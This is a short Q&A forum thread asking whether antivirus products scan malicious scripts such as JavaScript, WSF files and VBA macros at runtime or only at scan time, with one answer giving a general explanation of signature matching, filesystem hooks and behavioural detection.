Are scripts scanned by AVs at runtime?

Question

Are malicious scripts like (.js, .wsf, VBA macros) scanned at runtime? I noticed that if a malicious script is not detected at scantime it won't be detected at runtime either, only the downloaded file can be detected. All these scripts downloads file from internet and starts it, so I'm wondering if this behavior is detected at runtime, or if AVs wait for the downloaded file to be executed and then checks if that file is malicious. I suppose that all files are not detected at scantime.

Answer 1

Virusscanners (in general) hook in on the filesystem. This means whenever a file is transferred it passes the virusscanner, which tries a table of common know patterns (aka definitions) against the file. This works well for binary files as patterns are easier to detect in static content. Patterns are not the only assessment, for example Windows Defender traces routines to see where they lead to. A combination of system calls can also trigger an alert. Windows host scripts (eg, js, vba, vs) are well known to cause problems, and are scanned in various ways to insure they cannot cause harm (or unintended actions). Malware scanners have various ways of detecting threats, these a re only two of them.

If you were to download a random, malicious, python script that has been slightly altered to cover its purpose, changes are it will go unnoticed.

Executables are also checked before they are loaded into executable memory. Ofcourse options and techniques vary per product.